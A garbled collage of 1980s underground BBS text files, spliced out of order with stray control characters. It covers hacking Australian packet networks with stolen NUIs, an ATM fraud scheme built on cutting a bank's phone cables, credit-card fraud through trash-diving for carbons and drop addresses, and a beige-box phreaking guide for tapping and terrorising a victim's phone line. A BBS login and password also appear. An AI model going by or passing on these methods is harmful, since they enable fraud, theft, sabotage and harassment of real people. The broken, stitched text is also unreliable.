profile which incorporates flow control by the PAD. (Parameter 5 = 1) 3 : Profile recommended for C-DTE communicating with another C-DTE or with an LSCP. There is an idle timer delay to allow data to be sent from an auxiliary device. This profile is also suitible for certain terminals which transmit in blocks. 4 : Same as profile 3 except for a shorter idle timer delay and four padding characters after . 5 : Classic keyboard-printer terminal used for local printing. 6 : Same as simple profile (0) except for the procedures on BREAK. 7 : The only data forwarding conditions here are and BREAK;therefore with this profile complete packet sequences can represent logical entities manipulajI`ted by the application. 8 : Profile with only as data forwarding character, 7 padding characters after to C-DTE, and line folding by the PAD after 72 character line. 9 : Profile which is used for access by videotex terminals (1200/75 BPS) Note : Profile 9 has been changed from that previously published and is now only accessible to 1200/75 BPS users. 10: Profile which utilizelDns "Editing during data transfer" (Parameter 15 = 1) and employs as a line display character (Parameter 18 = 10) 11: This profile could be used instead of profile 2 for an LSCP without flow control by the PAD when a shorter transmission delay is required. 12: Same as profile 0 except for parameter 2, for terminals not needing echo by the PAD. Format to set PAD : SET : PAD COMMANDS AND INDICATIONS ============================================================== | PAD COMMAND | FUNCTION | INDICATION SENT | | FORMAT | | IN REPLY | ============================================================== STAT To request info | FREE or ENGADGED about a virtual | call with the | C-DTE | -------------------------------------------------------------- CLR Clear a virtual | CLR CONF or CLR ERR Call | (In the case of local | procedure error) -------------------------------------------------------------- PAR? To read parameter | PAR  wvWn't believe me, have a go at it, if you have fifty or so years to dedicate to it), but they do happen to leak out from time to time. a Typical austpac NUI has the following format: BHPLIBJ9ADF3 where the first six digits are the user supplied id code, ie BHPLIB in this case the NUI used to belong to the BHP LIBRARY. The last six digits are the telecom supplied part for security. One important thing to note is that when a NUI dies, only the last six digits are  ͠changed. Don't take my word for it since I haven't been able to verify this personally, but it makes sense and the rumours are there. Once you get the familiar AUSTPAC responce when you call up the system, you have a number of options. 1> - You connect to a system which will take collect calls, in which case, you don't need a nui. The format is just ? where NUA stands for Network User Address ie ?222321000 The NUA's a usually 9 char Cwacters long, but they can have two trailing digits to identify the specific system requested to the host. ie ?222321000 will give one system ?22232100001 will give a different system at the same site if appropriate. 2> - If you have a NUI, you can then connect to virtually thousands of systems all over the world. You can connect directly to any network which Austpac will support. If a network is not support Aed like in the case of DIALNET, you must find an alternate route. For example to excess DIALNET, you need to go via a DIALCOM system or any other system which has a contract to carry data between the network and itself. (I'll explain more about it later on) to connect to a system in the USA for example the format would be ?N- ie ?NBHPLIBJ9ADF3-0311041500101 The ')N' tells austpac that a NUI is to follow and to take the necassary measures. Austpac, like most other networks not only have a numerical address for each host system, but has an equivalent alphabetical code, to simplify the task of memorising the system addresses. For example: ?236620000 will do exactly the same job as: ?.memo In both cases you will be connected to TELECOM's TELEMEMO a mail system developed by the BELL LABORATORIES I believe, but quit;6e useless when compared to the more sophisticated ITT DIALCOM's network, of which MINERVA is but one. (Refer to the DIALCOM NETWORK later on) Host systems on AUSTPAC can be accessed not only via the AUSTPAC PAD, (Packet Assembly, Dissasembly), but through otther networks internationally. The international Code or DNIC for AUSTPAC is 5052 so to connect to TELEMEMO from lets say BERMUDANET, one would type the NUA with the 5052 prefix in front of it. Almost all networks also require+o^ a ZERO to be put infront of the DNIC and NUA to indicate an international connection. M I D A S 5053 ---------------- Midas is fundementally very simmilar to AUSTPAC, but there are many very significant differences. First of all the NUI's are only six digits long. This still gives a very large number of possibilities, however sprinting NUI's now becomes slightly closer to reality. There isn't a great deal which is different about Midas, but it has the advantage of connecting dirËفectly with another networks PAD. ie by connecting to the DNIC on networks where it is possible you will be connected to the actuall PORT or PAD of the foreign network. With Austpac this is possible only with TYMNET 03106, and few smaller US networks like COMPUSERVE etc. MIDAS unike Austpac at least has the decency to give a prompt '*' and the format for connections is simmilar. Example: *N- ĦqN ie: *NH7SVCO-03106001572 SOME TECHNICAL JUNK ON NETWORKS -------------------------------- I will not go into any great detail on how the packet switching networks works, but it's worth noting that it's a very clumsy system to use all because it's cost effitient. The Network PORT receives data from your terminal at your speed be it 300, 1200, etc, or 9600 if you are fortunate enough to have a dedicated connection. The Network receives the data and compiles it into a small packet of data. It put's an address tag on it and sends it off. It's bounced by few satellites etc and the system at the other end does the rest. It reads the address tag and delivers it to one of it's local systems at the speed at which it can be digested. As you can imagine, this can get very slow and clumsy over long distances and the only reason that it's done is they can neatly fit few thousand users on the one trunk, whizing individual packets back and forth. About 50% of netwol rks transmit packets at 9600 baud the rest have operating speeds of over 15000 baud. SYSTEM CRUNCHER has done a great job in his Austpac Tutorial, and me being as lazy as I am, cant be bothered typing the info out again, so here is an extract from the file dealing with Error codes and Profiles. They can be used in reference to most other networks ie MIDAS since it is a more or less universal standard. AUSTPAC TUTORIAL BY: SYSTEM CRUNCHER ===========================================  of the sparks and mini fire works.) Ok the banks compuer should be disabled now, so go to the nearest ATM you can find and pop your card in and try to do a ' ACCOUNT BALANCE '. You should get a NOT AVAILABLE - try again Later ERROR..If you do then start jumping up and down cause you have done it!! You see the main computer is programmed to give you whatever money you ask for when the lines are down, so they will not inconvenience the customers. So punch in the max. LIMIT any time bef ȿSore 12 midnight and then take out another batch after 12.00 midnight (or whatever other time you can).. When they Fix the Lines, the main computer will update the balance in the branches computer... (he he). Your account will have a Debit Balance and the bank manager will come after you..But he won't find you will he!! The major banks that to use this new system are: Westpac and National. I have tried it with both banks and it works great. Although I prefer National Bank since you cW@] an make $1,000 in a few minutes. 1.3 The "Snatch and Grab Method" ================================= STAY TUNED FOR THE REST!! installed. Once you have finally received your brand new savings account with fake name and addreYour acng up and down cause you have done it!! You see the main computer is programmed to give you whatever money you ask for when the lines are down, so they will not inconvenience the customers. So punch in the max. LIMIT any time befʍile #5 - UNIX SYSTEMS - PRIMENET, DIALCOM - PRIMOS - PRIMOS DEFAULTS - PRIMOS SUBDIRECTORIES - PRIMOS NUA SPRINTER - PRIMOS PHANTOM - PRIMOS TROJANS Force File #6 - DIALCOM PRIMOS COMMANDS Force File #7 - DIALCOM PRIMOS COMMANDS CONTINUED - PRIMENET PRIMOS COMMANDS˂ Force File #8 - PRIMENET PRIMOS COMMANDS CONTINUED - SELECTED PRIMOS COMMANDS - PRIMOS OPERATOR'S TRICKS - LATEST HACKER'S WEAPON - OUTDIAL SYSTEMS - CANADIAN DATAPAC OUTDIALS - SYSTEM IDENTIFICATION - INFO ON NETWORKS Force File #9 - INFO ON NETWORKS CONTINUED - PHREAKING =4,-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= P U B L I C D A T A N E T W O R K S ========================================= Once upon a time, the old OZ phreakes used their tones on New Zealands lines, to phreak around the world, but with the increasing prices of overseas telecomunications the PUBLIC DATA NETWORKS or PACKET SWITCHING NETWORKS have been one of the most usefulls tools at the hackers disposal. Australia has two major networks. AUS ]߻TPAC operated by telecom and very slack, and not so slack MIDAS, run by the OTC. A U S T P A C 5052 ====================== Communicationg via Austpac or Midas for that matter can be a very costly hobby, unless one has NUI or Network User Identification, which lives on someone elses bank accoount. (Think of it as helping the Australian Economy if you have any guilt feelings). The Austpac NUI's a virtually impossible to hack using any sprinting or scaning procedure. (If you doCinteresting collection of people. Anyway, I am about to retire for a while from the world of hacking and the following is a basic summary of well over five years of work. (Well, perhaps I won't retire, just evolve into the next stage hehehe). I hope this will make it easier for the people to come and I hope they will add their acquired knowldge. First of all I would like to thank: THUNDERBIRD 1 THE WIZARD THE TRADER And all those who from thek/6T begining battled the security of the first analogue computers and passed on their knowldge. The files are broken up into several volumes, covering the following: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= M E N U =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Force File #1 - PUBLIC DATA NETWORKS - AUSTPAC 5052 Ћݫ - MIDAS 5053 - SOME TECHNICAL JUNK ON NETWORKS - AUSTPAC TUTORIAL BY SYSTEM CRUNCHER - NUA STRUCTURES - INTERNATIONAL DNICS Force File #2 - US AREA CODES - TYMNET NUA SPRINTS - TELENET NUA SPRINTS Force File #3 - TELENET NUA SPRINTS CONTINUED - DATAPAC NUA SPRINTS Force File #4 - ITT/UDTS NUA SPRINTS - DIALNET NUA SPRINT - PSS NUA SPRINTS - DATEX-P NUA SPRINTS - TELEPAK NUA SPRINT - TRANSPAK NUA SPRINT - AUSTPAC NUAS - LOCATING PTSN NUMBERS - OBTAINING PASSWORDS / INFOLTRATING SYSTEMS - DEFAULT PASSWORDS - VAX SYSTEMS Force F  " 2 [Security Level] : CHANGE ERROR RESPONSES. With the CLASS1 & 2 COMMANDS, you have the ability to change the type of response given by the computer. This can range from doing nothing about it, to logging the user off. IF YOU DONT HAVE ACCESS TO DG THEN LEAVE ME MAIL AND I'LL PUT UP WHATEVER I CAN ABOUT THE COMMANDS AND MACROS AND WHAT ALL. SYSTEM UTILITY COMMANDS ----------------------- AOSGEN : GENERATE A NEW AOS. VSGEN : GENERATE A NEW AOS/VS SYST Ln is to open up a bank savings account at one of the banks that gives you access to the ATM.. The Major banks have the following Packages: Westpac - Advantage Saver National - Flexi Card C'wealth - Key Card I suggest you go for National Bank as their limit is $500 per day, where Westpac has a $200 Max Limit per day.. Give them an address where you can check the mail everyday (so you can receive your card and PIN number)...An old house etc. will do very well. Make sure you op ã3en the account at a 'small' suburb branch, that has computer equipment installed. Once you have finally received your brand new savings account with fake name and addreYour account record is kept at your branches computer. So what the main computer does is get in touch with the branches (on the network) and ask it information on your account. (Balance etc.). Ok so what do we do with the cutters??? Well go to your banks branch (at about 10.00 - 11.00 pm), Find the Concrete Telecom cov O1Ser near the bank and lift it off using the handle of the Cutters. Ok, See if there are cables leading from the main tube into a smaller tube that leads underground into the bank...Well take your cutters and snip them..Ok well congratulations you have just cut the phone cables for all their phones and their branch computer system.. If you wanna be a bit more sure that you cut the cable to the computer, Snip every cable in sight of the bank. (Use insulated cutters and don't be afraid ִ>c[ + + + + + + +----------------------------------+ Welcome everybody to my first article dealing with the manipulation of the Bank's Automated Teller Machines for the gain of money.. In this article I will show you many ways to 'beat' the system. Some methods of hacking into ATM's are very easy and others are a bit more difficult. I suggest you pick the method that mostly suits you. Okay Lets get straight into it.... 1.0 Different types of Automatic Tellers ============================================ There are 3 major types of Automatic teller machines. IBM === The first of these (and the most popular) is the IBM model. This is easily distinguised from the others by the IBM logo in the top right hand corner of the front of the machine. This unit features a touch sensitive keypad and a 1 line ydisplay with a visor that moves up and down. (The newer models have a 5 line display).. NCR === The second unit is the NCR unit, which is MUCH smaller than than the IBM front panel. This unit has a small VDU as well as a touch sensitive keypad. The only banks that seem to be using this unit in Australia is the 'STATE BANK' of Victoria, so you will not see many of them around. PHILIPS ======= The third and final unit is made by Philips as is only used by the credit unions or Building gewwSocietys. This is usually known as 'CASHCARD'. These units feature a push-button keyboard and a VDU (like the NCR). All these above units provide the same functions... 1.1 Information on the Plastic Cards ====================================== The Plastic Cards that you put into these cash carrying monsters have a Number that is printed on the front of the card (which is also the same number, that is stored on the MAGNETIC STRIP on the back of the card.) What do these numbers mڜ#ean????? Well here is some information on them... The Numbers are split up into 2 groups, the first group ALWAYS contains SIX numbers while the second group contains anywhere between 6 to 13 numbers. EG) 560192 3012565214782 \ /\ / | |__ This 3 digit number identifies the Bank. | |__ This is the Australian ID code and ALL banks have this. Some ID's for banks =================== 192 - Westpac Banking C.rcQorporation 251 - National Australia Bank 220 - Commenwealth Bank The Second part of the number seems to be a jumble of digits for 6 to 13, which only seem to make sense to the banks computer. The banks computer simply looks the second number up in a Table and finds out your assigned PIN number (A password for your card consisting of 4 digits), and any other information. eg) Your savings account no. Cheque a/c etc. Since the four Digit PIN (Personal IdentificaҺ'tion Numbers) range from 0000 to 9999, then more than one person has the same PIN number for his card. (Banks do have more that 10,000 customers !!) Okay now that we have some simple background information we can learn how to 'defeat' the system.. 1.2 The "CABLE CUTTER METHOD" =============================== For this method you will require the Follwing: (1) - Guts (2) - Good Pair of SIDCHROME cutters (3) - Fake ID (library cards, Concession Cards etc.) Okay the First Step&ݠyuAN, ETC, WHERE THE VICTIM'S FONE LINE CONNECTS) WHAT TO DO: YEAH, SIMPLE ENUFF, YOU HAVE ALL THE PARTS TOGETHER. NOW, GO OUT TO THE VICTIM'S GREEN BASE, AND TRY TO MAKE SURE THAT THE VICTIM OR ANY PASS-ER-BY'S DON'T SEE YOU DOING THIS. OPEN THE GREEN BASE OR OUTPUT DEVICE, OR WHATEVER, AND USING ANI, FIND THE VICTIM'S FONE NUMBER. OK, YOU FOUND IT, ' OR YOU DIDN'T. IF YOU DIDN'T FIND IT, GO TO ANOTHER OUTPUT DEVICE IN THE NEARBY AREA AND TRY AGAIN. ASSUMING YOU FOUND THE VICTIM'S FONE NUMBER, ATTATCH ONE BEIGE BOX TO THE VICTIM'S FONE LINE, BUT KEEP IT ON-HOOK (THE SWITCHOOK DOWN, SO IT WILL RING WHEN CALLED, LETS CALL THIS BEIGE BOX 1) AND STICK THE OTHER BEIGE BOX ON ANOTHER PAIR OF TERMINALS DIFFERENT FROM THE VICTIM'S TERMINALS. (ߓ LET'S CALL THIS BEIGE BOX 2. LET'S HOPE YOU HAVE ENUFF BRAIN POWER FOR THE NEXT STEP: USING BEIGE BOX 2, CALL THE VICTIM'S HOUSE. BEIGE BOX 1 SHOULD RING, BUT DON'T PICK IT UP UNTIL THE RINGING STOPS, WHICH MEANS THE VICTIM/VICTIM'S FAMILY HAS PICKED THE FONE UP. THEN, PICK UP BEIGE BOX 1. OK, NOW BEIGE BOX 1 AND 2 BOTH ARE OFF-HOOK. SAY SOMETHING THROUGH BEIGE BOX 2, LIKE HEAVY BREATHING OR )o±SOMETHING LIKE, "TTHHHHHIIIISSSSS ISSS THEEE MUTILATORRSSS.... I'M INN YOUR HOUSSSSSS.....!" OK, HERE'S ANOTHER CRUCIAL POINT. AT THIS POINT, THE VICTIM WILL EITHER SAY, "WHAT?", "BULLSHIT, FUCK OFF!", OR SOMETHING LIKE THAT AND HANG UP OR STAY ON-LINE FOR A BIT. IF THEY HANG UP, REMEMBER, YOU STILL HAVE BEIGE BOX 1 ATTACHED... HEHE... THROUGH BEIGE BOX 1, KEEP THREATENING THEM WITH MANIACAL SOU*-LĆNDS AND SHIT YOU SEE IN HORROR MOVIES ALL THE TIME. THAT WILL "PHREAK" THEM OUT (THEY WILL THINK SOMEONE IS CALLING THEM FROM THEIR OWN HOUSE...) SEE WHAT I'M GETTING AT? PRETTY PHUN, HUH? ANOTHER METHOD: OK, LETS SAY YOU HAVE ONLY 1 BEIGE BOX. BUT, YOU ALSO KNOW THE RINGBACK NUMBER TO YOUR AREA. OK, SIMPLE, GO TO THE VICTIM'S OUTPUT DEVICE, FIND HIS FONE NUMBER WITH ANI, ATTACH YOU+AR BEIGE BOX TO HIS FONE LINE, DIAL RINGBACK, AND WAIT FOR THE VICTIM TO PICK THE FONE UP. WHALA, READ THE ABOVE PARAGRAPH FOR WHAT TO DO FROM HERE... HEHE, THE VICTIM CANNOT DISCONNECT YOU CUZ YOU'RE JUST ANOTHER EXTENSION OF THE HOUSE'S FONE SYSTEM... YOU'RE SCARE THE SHIT OUT OF MOST PEOPLE... ESPECIALLY ON HOLLOWEEN!!!!!! CONCLUSION: SOOO, THAT'S THE PLAN, AND IF YOU'RE SMART, YOU CAN SEE , HOW THIS WOULD SCARE THE SHIT OUT OF PEOPLE. IF YOU CAN'T SEE WHY, GO KILL YOURSELF. OK, WELL, BYE BYE FOR NOW, AND BE WATCHING FOR MORE PHUN PHILES BY PPP AND AAXA. OTHER THAN THAT, HAPPY HOLLOWEEN, AND PHUCKIN' PHREAK YOUR NEIGHBORHOOD TO THE GROUND.... ENJOY..... ------------------------------------------------------------ (X) 1989 - PPP - PHUCKIN' PHIELD PHREAKERS (A) 1989 - AAXA - APO-t[mSTLES OF ANARCHY X AMERICA ------------------------------------------------------------ THIS PHILE WAS WRITTEN ON OCTOBER 31, 1989 - 5:50PM!!! ------------------------------------------------------------ PPP ARE: DOCTOR DISSECTOR, KILLER KOREAN, PHORTRESS PHREAK, M.I.T., WHITE BOY, THE LODE RUNNER, DARK HELMET, TAK/SCAN. AAXA IS A BUNCH OF TEXT PHILE WRITERS.... HEHEHEHEHEHEH! ---------.=.--------------------------------------------------- GREETS TO CDC, ANARCHIST'S ALLIANCE, CHINA. ------------------------------------------------------------ INSIDIOUS INFUSION.... 619-679-0248 12/24/MNP LOGIN=FUSION NUPW=REACTOR ------------------------------------------------------------ --------------------------------------- ENTER (1-49, M=MENU, Q=QUIT) 1989 - AAXA - APO 挫NSES. CLASS2 [Security Level] : CHANGE ERROR RESPONSES. With the CLASS1 & 2 COMMANDS, you have the ability to change the type of response given by the computer. This can range from doing nothing about it, to logging the user off. IF YOU DONT HAVE ACCESS TO DG THEN LEAVE ME MAIL AND I'LL PUT UP WHATEVER I CAN ABOUT THE COMMANDS AND MACROS AND WHAT ALL. SYSTEM UTILITY COMMANDS ----------------------- AOSGEN : GENERATE A NEW AOS. VSGEN : GENERATE A NEW AOS/VS SYST ѝEM. MELBOURNE DATA GENERAL SYSTEMS ------------------------------ NAME TYPE NUMBER BAUD ==================================================== TELEDATA MV8000 813-3522 300 " " 813-3733 1200/75 " " ?238221000 AUSTPAC B.H.P. MV6000 ?238221001 AUSTPAC C.I.T. MV8000 211-4511 300 ======= TELEDATA MV8000 813-3522 300 " XToWOULD BE A GOOD IDEA, SINCE MAYBE YOU COULD GET LUCKY AND SNIPE THEIR VISA STATEMENT. THAT JUST GOES TO SHOW THAT READING >SOME< VALUE. LOOK FOR CARDS LIKE THIS ONE: 5024 0000 6184 3847 THE SECOND CLUSTER MEANS IT'S A "PREFERRED" CARD, AND YOU CAN ORDER MORE STUFF WITH IT. SOME CARDS ONLY HAVE 13 DIGITS (I.E: 5024 000 618 787). IF YOU THINK YOU HAVE ORDERED THE LIMIT OF YOU'RE CARD, VERIFY IT. YOU DO THIS BY CALLING A DIAL UP (USUALLY 800), GIVING THEM A MERCHANT NUMBER,Ά THE CARD NUMBER, THE NAME ON THE CARD, THE EXPIRATION DATE, AND THE AMOUNT TO BE SPENT. THEY WILL TELL YOU IT THE CARD HAS ENOUGH MONEY FOR THE PURCHASE. GET A DIAL UP AND MERCHANT NUMBER BY GOING TO THE DEPARTMENT STORE. THEY ARE USUALLY WRITTEN ON THE PHONES. FOR MASTERCARD, THE INTERBANK NUMBER IS RIGHT BELOW THE NAME ON THE CARBON. VISA CARDS CONTAIN A BANK NUMBER IN ONE OF THE CLUSTERS. DON'T ORDER FROM NORTHWESTERN. THERE PRICES ARE NOT WORTH ALL OF THE QUESTIONS YOU HBչAVE TO ANSWER. ORDER FROM CONROY-LAPOINTE AT 800/547-1289, THEY ARE QUITE EASY. CONCLUSION ========== THERE ARE NO OLD CARDERS. YOU QUIT, OR YOU GET CAUGHT. PLAN WHAT YOU WANT TO GET, AND DON'T TRY AND RUSH YOUR FRAUDS. THE FIRST RULE OF FRAUD IS, "GREED KILLS." I THINK BEING ARRESTED BY THE FEDS AND HAVING TO FACE MY PARENTS AND LOSE MY COMPUTER ABOUT THE SAME AS DEATH. BUT WHAT IS LIFE WITHOUT A LITTLE RISK? TRY TO SELL MOST OF THE THINGS YOU CARD. IF THERE IS NO STOLEN (:oCARDED) STUFF IN YOU'RE HOUSE, THEY MIGHT GO EASIER ON YOU. BY THE WAY, I AM IN NO WAY RESPONSIBLE FOR ANY USE MADE OF THE INFORMATION IN THIS FILE. IT IS FOR INFORMATIONAL PURPOSES ONLY. AND IF YOU BELIEVE THAT, PLEASE LEAVE ME MAIL ON SMOG CITY ABOUT A BUSINESS OPPORTUNITY. I HAVE THIS BRIDGE... THAT'S ABOUT IT FOR NOW. LOOK FOR VOLUME II IN THE ADVERNTURES IN FRAUD SERIES. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= < VOLUME I IN THE ADVENTUREԎpS IN FRAUD SERIES > < COPYRIGHT (C) 1985 > < BY: SNEAK THIEF > < A SMOG CITY CREW FILE > < THANKS TO: THE RAIDER, GRANDMASTER DST, THE MUGGER, AND > < SIMON TEMPLAR FOR TELLING ME THINGS I DIDN'T KNOW BEFORE > < SMOG CITY....213-926-7720 > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-= NOW THAT YOU'VE FINISHED THE FILE, CALL SMOG CITY...IT'S A GREAT BOARD! PERMISSION IS GIVEN TO PUT THIS FILE ANYWHERE, AS LONG AS THE CREDITS ARE INTACT. JUNE 6, 1985 - SNEAK THIEF OF THE SMOG CITY CREW THE END --------------------------------------- ENTER (1-49, M=MENU, Q=QUIT) :48 --------------------------------------- [CTRL-S PAUSES/SPACE=QUIT] PHUCKIN' PHIELD PHREAKERS PRESENT IN COALIT!DXION WITH THE APOSTLES OF ANARCHY ACROSS AMERICA ------------------------------------------------------------ SCARING THE PHUCK OUT OF YOUR PHRIENDS (OR ENEMIES) IF YOU'RE A PHUCKIN' PHREAK ------------------------------------------------------------ DISCLAIMER: HAVE A PHUCKIN' K-RAD TIME WITH THE SHIT IN THIS FILE, AND WE SUGGEST"Y M YOU TRY THIS WHENEVER YOU HAVE SPARE TIME AND A BEIGE BOX IN YOUR HANDS. WHY? CUZ WE DON'T GIVE A SHIT, AND WE'RE NOT RESPONSIBLE ANYWAY! HAHA! INTRO: YEAH, SO, YOU HAVE A BEIGE BOX AND YOU'RE SICK OF IT. BIG FAT HAIRY DEAL. OK, THE ONLY REASON I'M WRITING THIS LAME TEXT PHILE IS CUZ IT'S HOLLOWEEN TODAY, AND I JUST MIGHT TRY THIS TRICK ON SOME LAMERS OUT THERE. OK, LIKE I SA#$]UID, YOU HAVE A BEIGE BOX. OVER THE PAST FEW WEEKS, YOU HAVE USED, ABUZED, AND PHUCKED WITH YOUR BEIGE BOX. YEAH, BIG DEAL, SO YOU CALLED 100 1-900/976 FONE NUMBERS ON SOMEONE ELSE'S BILL. BUT, ANYONE CAN DO THAT, RIGHT? BUT, NOW YOU'RE SICK OF IT, SICK OF JUST ADDING DOLLARS AND CENTS TO YOUR PHRIEND'S FONE BILL. SO, WHATTA YA DO? NUMBER ONE, READ THIS PHILE, UNLESS YOU'RE A LAMER, T$瘿.HEN BURN THIS PHILE AND GO JUMP OFF A BRIDGE. OK, IF YOU'RE STILL AROUND AT THIS POINT (AND I'M ASSUMING YOU'RE NOT A LAMER, AND IF YOU ARE, I GUESS YOU DON'T SPEAK OR READ ENGLISH!), READ ON! THE TRICK: OK, OK, OK, SO WHAT'S THE BIG STORY HERE? AS A BEGINNING THOUGHT, HAVE YOU EVER WANTED TO PHUCKING SCARE THE SHIT OUT OF SOMEONE SOMEWHERE? WELL, NOW YOU CAN! SAFELY! %tXo WHAT WE'RE GONNA TEACH YOU TA DO IS TO SCARE THE LIVING SHIT OUT OF YOUR PHRIEND (ENEMY, BYSTANDER, ETC) AND THEN GET LOADS OF LAFFS AT THE SAME TIME. READ ON: WHAT YOU NEED: 2 BEIGE BOXES (PORTABLE LINEMAN'S HANDSETS) 1 VICTIM 1 PHREAK MINIMUM (MORE PHREAKS FOR MORE PHUN, BUT NO PHUCKIN' LAMERS) 1 VICTIM'S GREEN BASE (OUTPUT DEVICE, CU˝߾ѺѺ#QO   >OOI:OOI8OOI6OOI>|rc% THE BEST WAY IS JUST TO USE TRW...IF YOU HAVE A PASSWORD FOR IT. MISCELLANOUS ============ READING AN ISSUE OF U.S NEWS AND WORLD REPORT (JUNE 3, 1985) YESTERDAY, I FOUND AN ARTICLE ON PHREAKING, FRAUD, AND BBS'S. VERY INTERESTING. SAID SOMETHING ABOUT MAILBOXING, WHICH IS GOING THROUGH A COMPANY MAILBOX LOOKING FOR LET'S SAY BILLS AND THE LIKE WHICH WOULD HAVE A CREDIT NUMBER ON IT. SOUNDS INTERESTING. GO ON A SATURDAY, AND LOOK IN THE MAILBOXES. THE LAST FEW DAYS OF A MONTH b,THANX TO: THE RAIDER | | COPYRIGHT, (C) 1985 BY SNEAK THIEF | |\ /| \=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=/ INTRODUCTION ============ YOU EVER WONDER WHERE THAT UNEMPLOYED GUY DOWN THE STREET GOT ENOUGH CASH TO START A 1200 BAUD BOARD WITH 60 MEGS? WELL, THE ANSWER, MOST LIKELY, IS CREDIT FRAUD. CREDIT FRAUD INVOLVES GETTING A CREDIT CARD NUMBER (A CC #), AND THEN ORDERING THINGS BY PHOzNE. ALL YOU NEED IS THE CARD NUMBER AND THE EXPERATION DATE. AND A FEW OTHER NASTIES... WELL, FORGET THIS BASIC STUFF! LET'S GET INTO THE GOOD PARTS.... GETTING YOUR CARD =================== ALWAYS BEEN METICULOUS ABOUT YOUR APPEARENCE? DON'T LIKE TO BE DIRTY? THEN THE PRIMARY METHOD OF GETTING CREDIT CARDS IS NOT GOING TO APPEAL TO YOU. WHEN A CUSTOMER BUYS SOMETHING AT A STORE OR RESTAURANT (WITH A CREDIT CARD, OF COURSE), SEVERAL CARBONS ARE MADE. THE STORE PUTS THESE INI;TO THEIR FILES, AND THROWS THEM AWAY A WEEK OR SO LATER. WHAT'S THAT? YOU SAY, "WHY DON'T I GO TO THE TRASH, AND GET THESE CARBONS?", DO YOU? WELL, YOU'RE CORRECT; THIS IS EXACTLY WHAT YOU DO. HERE ARE SOME TIPS: 1) GO ON THE FIRST OF THE MONTH. (IN A LOT OF STORES, THIS IS THE 'CLEAR THE FILES DAY'. 2) GO TO THE MALL. THAT WAY, IF ONE TRASH CAN IS EMPTY, YOU HAVE A HUNDRED OR SO MORE. 3) STAY AWAY FROM FOOD STORES. STICKING YOU'RE HAND INTO LAST WEEK'S FRIED CHICKE<ɾN IS A PRICE TOO HIGH FOR A LOUSY CREDIT CARD. 4) FOR CONVIENENCE, LOOK FOR FLORISTS, VIDEO STORES AND THE LIKE. VIDEO STORES ESPECIALLY, SINCE >EVERY< TRANSACTION THEY MAKE INVOLVES A CREDIT CARD. OK, THAT IS JUST ONE OF THE WAYS WHICH YOU CAN GET YOU'RE CARD HERE ARE THE OTHER PRIMARY METHODS: CBI/TRW ======= CBI AND TRW ARE CREDIT SERVICES WHICH HAVE CREDIT CARDS, ADDRESSES, NAMES, AND DRIVER'S LICENSES FOR MOST OF THE POPULATION OF THE UNITED STATES. YOU CAN ALSO US*E THIS SYSTEM TO FIND OUT THE CREDIT CARD MEND CALLING THROUGH A PBX, THEN XXXXX (INSERT YOU'RE FAVORITE PHONE SERVICE HERE). LEECHING ======== YOU COULD ALSO GET THEM OFF THE CREDIT FRAUD BOARD ON YOU'RE LOCAL ELITE BBS. NOT A GOOD IDEA, SINCE MOST CARDS UP THERE HAVE ABOUT 1,000 DOLLARS WORTH OF PORNO TAPES ON THEM. BETTER YET, YOU CAN ASK A FRIEND. THIS WILL PROBALY WORK, BUT SOMETIMES PEOPLE GIVE A CARD THAT THEY HAVE USED, OR USED BUT MESSED UP WITH. OH, THE DEATH OF FRIEN <DSHIP! OK, YOU'VE GOT YOUR CARD? GOOD. ORDERING ======== YOU'VE GOT TO ORDER YOUR MERCHANDISE. TO DO THIS, CALL THE ORDERLINE FOR THE COMPANY, AND TALK TO THESE PEOPLE. IF YOU'RE KNOWN AS "THE HUMAN CARRIER" BY YOU'RE FRIENDS, OR MODEMS CONNECT WHEN YOU SAY "HELLO", THEN FORGET IT. THESE DAYS THEY ARE GETTING MIGHTY SUSPICOUS. THEY WILL ASK YOU WHAT CARD YOU WANT TO USE. MASTER CARDS HAVE A 5 AS THE FIRST DIGIT OF THE FIRST CLUSTER, VISAS HAVE A 4. IF ICE--VERY SOFTLY. JUSu-T SAY, "I'M SORRY... I HAVE THIS AWFUL SORE THROAT..." THE FIRST RULE IS BE POLITE. DON'T SOUND NERVOUS. IF THE LADY ASKS YOU FOR THE DRIVER'S LICENSE, AND YOU DON'T HAVE IT, MAKE ONE UP, THEN BEFORE YOU HANG UP, SAY "I'M SORRY, I'M GOING TO HAVE TO CANCEL THIS ORDER...MY HUSBAND TOLD ME THAT HE HAD ALREADY GOTTEN THE XXXXX (THE ITEM YOU WERE TRYING TO ORDER)" TRY TO ORDER FROM A PAY PHONE, AND WHEN THEY ASK FOR A PHONE NUMBER, GIVE THEM THE PAY PHONE'S NUMBER. OR SCAN FOR A NUMqBER THAT WILL RING, AND RING... A BOARD THAT IS DOWN IS A GOOD BET. NOW, YOU MAY ASK, WHAT ADDRESS DO I GIVE THE SALESMAN? THE ADDRESS =========== THE PICK UP IS ONE OF THE MOST CRUCIAL PART OF THE ENTIRE PART. HERE IS WHAT I THINK THE ULTIMATE ADDRESS SHOULD BE: 1) ABANDONED. 2) ISOLATED (NO LITTLE OLD LADIES CALLING THE POLICE OR SPRAYING YOU WITH HOSES). 3) ABOUT A MILE OR SO AWAY FROM YOUR HOUSE. NUMBER ONE COULD ALSO HAVE A FRIEND OF YOURS WHO WILL SIGN FOR THE PACKAG_=E, THEN WHEN THE FEDS COME DENY IT EVER ARRIVED. THIS IS UNLIKELY. NUMBER TWO IS OBVIOUS. I HAVE BEEN YELLED AT BY NUMEROUS OLD PEOPLE, AND PEOPLE THAT DON'T SPEAK ENGLISH. NOT FUN. THE MILE AWAY FROM YOU'RE HOUSE IS OBVIOUS. DON'T WANT PEOPLE THAT KNOW YOU TO BE WITNESSES. ALSO, YOU CAN ORDER TO AN OCCUPIED HOUSE. SEND THEM A NOTE BY MAIL, TELLING THEM ABOUT A "COMPUTER GLITCH THAT SENT SOME OF OUR 